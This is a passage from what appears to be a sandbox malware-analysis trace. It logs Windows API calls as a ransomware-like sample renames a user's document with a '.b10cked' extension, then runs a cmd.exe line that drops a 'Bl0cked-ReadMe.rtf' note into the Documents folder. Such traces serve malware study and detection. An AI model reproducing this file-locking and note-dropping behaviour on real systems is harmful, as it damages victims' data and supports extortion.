(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod~1.ots")) returned 0x20 [0234.919] SetErrorMode (uMode=0x0) returned 0x0 [0234.919] SetErrorMode (uMode=0x1) returned 0x0 [0234.919] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", nBufferLength=0x104, lpBuffer=0x2af198, lpFilePart=0x2aef30 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", lpFilePart=0x2aef30*="AK_FOD~1.OTS") returned 0x2d [0234.919] SetErrorMode (uMode=0x0) returned 0x1 [0234.919] SetErrorMode (uMode=0x0) returned 0x0 [0234.919] 
SetErrorMode (uMode=0x1) returned 0x0 [0234.919] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked", nBufferLength=0x104, lpBuffer=0x2af3a0, lpFilePart=0x2aef30 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked", lpFilePart=0x2aef30*="aK_FOd5jl.ots.b10cked") returned 0x36 [0234.919] SetErrorMode (uMode=0x0) returned 0x1 [0234.919] SetLastError (dwErrCode=0x0) [0234.919] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod5jl.ots.b10cked")) returned 0xffffffff [0234.919] GetLastError () returned 0x2 [0234.920] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x2ae8ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ae8ac) returned 0x80e90 [0234.920] FindNextFileW (in: hFindFile=0x80e90, lpFindFileData=0x2ae8ac | out: lpFindFileData=0x2ae8ac) returned 0 [0234.920] GetLastError () returned 0x12 [0234.920] FindClose (in: hFindFile=0x80e90 | out: hFindFile=0x80e90) returned 1 [0234.921] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\AK_FOD~1.OTS", fInfoLevelId=0x1, lpFindFileData=0x91bf8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x91bf8) returned 0x80e90 [0234.921] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked", nBufferLength=0x104, lpBuffer=0x2aeb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked", lpFilePart=0x0) returned 0x36 [0234.921] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots", nBufferLength=0x104, lpBuffer=0x2aeb44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots", lpFilePart=0x0) returned 0x2e [0234.921] GetFileAttributesW 
(lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod5jl.ots")) returned 0x20 [0234.921] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod5jl.ots"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\aK_FOd5jl.ots.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\ak_fod5jl.ots.b10cked"), dwFlags=0x3) returned 1 [0234.922] FindClose (in: hFindFile=0x80e90 | out: hFindFile=0x80e90) returned 1 [0234.922] _vsnwprintf (in: _Buffer=0x49fd5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2aeaf8 | out: _Buffer=" 1") returned 9 [0234.922] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.922] GetFileType (hFile=0x7) returned 0x2 [0235.362] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0235.362] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2aea84 | out: lpMode=0x2aea84) returned 1 [0235.362] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.362] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2aeab8 | out: lpConsoleScreenBufferInfo=0x2aeab8) returned 1 [0235.362] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0235.362] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x49fe4640, nSize=0x2000, Arguments=0x2aeaf8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0235.362] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49fe4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2aeadc, lpReserved=0x0 | out: lpBuffer=0x49fe4640*, lpNumberOfCharsWritten=0x2aeadc*=0x1a) returned 1 [0235.363] _get_osfhandle (_FileHandle=1) returned 0x7 [0235.363] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0235.363] _get_osfhandle (_FileHandle=1) returned 0x7 
[0235.363] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0235.363] _get_osfhandle (_FileHandle=0) returned 0x3 [0235.363] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0235.363] SetConsoleInputExeNameW () returned 0x1 [0235.363] GetConsoleOutputCP () returned 0x1b5 [0235.363] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0235.363] SetThreadUILanguage (LangId=0x0) returned 0x409 [0235.363] exit (_Code=0) Process: id = "632" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16600" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35008 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35009 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35010 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35011 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000170000" filename = "" Region: id = 35012 start_va = 0x49fb0000 end_va = 0x49ffbfff entry_point = 0x49fb0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35013 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35014 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35015 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35016 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 35017 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35306 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35307 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35308 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35309 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 35310 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" 
filename = "" Region: id = 35311 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35312 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35313 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35314 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35315 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35316 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35317 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35318 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35319 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" 
Region: id = 35320 start_va = 0x270000 end_va = 0x337fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 35321 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35322 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35323 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35324 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 35325 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 35326 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 35327 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 35328 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 35329 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Thread: id = 870 os_tid = 0xa94 [0234.849] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fadc | out: lpSystemTimeAsFileTime=0x26fadc*(dwLowDateTime=0xbf709480, dwHighDateTime=0x1d440a9)) [0234.849] GetCurrentProcessId () returned 0xac8 [0234.849] GetCurrentThreadId () returned 0xa94 [0234.849] GetTickCount () 
returned 0x407dc [0234.849] QueryPerformanceCounter (in: lpPerformanceCount=0x26fad4 | out: lpPerformanceCount=0x26fad4*=29163858325) returned 1 [0234.850] GetModuleHandleA (lpModuleName=0x0) returned 0x49fb0000 [0234.850] __set_app_type (_Type=0x1) [0234.850] __p__fmode () returned 0x76b331f4 [0234.850] __p__commode () returned 0x76b331fc [0234.850] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49fd21a6) returned 0x0 [0234.850] __getmainargs (in: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c, _DoWildCard=0, _StartInfo=0x49fd4140 | out: _Argc=0x49fd4238, _Argv=0x49fd4240, _Env=0x49fd423c) returned 0 [0234.850] GetCurrentThreadId () returned 0xa94 [0234.850] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa94) returned 0x38 [0234.850] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0234.850] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0234.850] SetThreadUILanguage (LangId=0x0) returned 0x409 [0234.851] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0234.851] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fa6c | out: phkResult=0x26fa6c*=0x0) returned 0x2 [0234.851] VirtualQuery (in: lpAddress=0x26faa3, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.851] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0234.851] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x171000, 
AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0234.851] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0234.851] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26fa3c, dwLength=0x1c | out: lpBuffer=0x26fa3c*(BaseAddress=0x270000, AllocationBase=0x270000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0234.851] GetConsoleOutputCP () returned 0x1b5 [0234.851] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.851] SetConsoleCtrlHandler (HandlerRoutine=0x49fce72a, Add=1) returned 1 [0234.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.851] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0234.851] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.851] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0234.852] _get_osfhandle (_FileHandle=1) returned 0x7 [0234.852] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0234.852] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.852] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0234.852] _get_osfhandle (_FileHandle=0) returned 0x3 [0234.852] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0234.852] GetEnvironmentStringsW () returned 0x390180* [0234.852] FreeEnvironmentStringsW (penv=0x390180) returned 1 [0234.852] GetEnvironmentStringsW () returned 0x390180* [0234.852] FreeEnvironmentStringsW (penv=0x390180) returned 1 [0234.852] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9dc | out: phkResult=0x26e9dc*=0x40) returned 0x0 
[0234.852] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0xa8, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.852] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x1, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x1, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x0, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x40, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x40, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x40, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegCloseKey (hKey=0x40) returned 0x0 [0234.853] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e9dc | out: phkResult=0x26e9dc*=0x40) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, 
lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x40, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x1, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x1, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x0, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x9, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x4, lpData=0x26e9e8*=0x9, lpcbData=0x26e9e0*=0x4) returned 0x0 [0234.853] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e9e4, lpData=0x26e9e8, lpcbData=0x26e9e0*=0x1000 | out: lpType=0x26e9e4*=0x0, lpData=0x26e9e8*=0x9, lpcbData=0x26e9e0*=0x1000) returned 0x2 [0234.853] RegCloseKey (hKey=0x40) returned 0x0 [0234.853] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863c2 [0234.853] srand (_Seed=0x5b8863c2) [0234.853] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0234.853] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"" [0234.853] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.854] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3918e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0234.854] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0234.854] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0234.854] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.854] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0234.854] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0234.854] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0234.854] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0234.854] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0234.854] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0234.854] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0234.854] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0234.854] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0234.854] GetEnvironmentStringsW () returned 0x3922d0* [0234.854] FreeEnvironmentStringsW (penv=0x3922d0) returned 1 [0234.854] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0234.854] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0234.854] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0234.854] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0234.854] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0234.854] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0234.854] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0234.854] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0234.854] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0234.854] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0234.854] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f7a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.855] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f7a8, lpFilePart=0x26f7a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f7a4*="Desktop") returned 0x18 [0234.855] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.855] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f524 | out: lpFindFileData=0x26f524) returned 0x390010 [0234.855] FindClose (in: hFindFile=0x390010 | out: hFindFile=0x390010) returned 1 [0234.855] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f524 | out: lpFindFileData=0x26f524) returned 0x390010 [0234.855] FindClose (in: hFindFile=0x390010 | out: hFindFile=0x390010) returned 1 [0234.855] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f524 | out: lpFindFileData=0x26f524) returned 0x390010 [0234.855] FindClose (in: hFindFile=0x390010 | out: hFindFile=0x390010) returned 1 [0234.855] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0234.855] 
SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0234.855] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0234.855] GetEnvironmentStringsW () returned 0x392af0* [0234.856] FreeEnvironmentStringsW (penv=0x392af0) returned 1 [0234.856] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fd5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0234.856] GetConsoleOutputCP () returned 0x1b5 [0234.856] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0234.856] GetUserDefaultLCID () returned 0x409 [0234.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fd4950, cchData=8 | out: lpLCData=":") returned 2 [0234.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f8e8, cchData=128 | out: lpLCData="0") returned 2 [0234.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f8e8, cchData=128 | out: lpLCData="0") returned 2 [0234.856] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f8e8, cchData=128 | out: 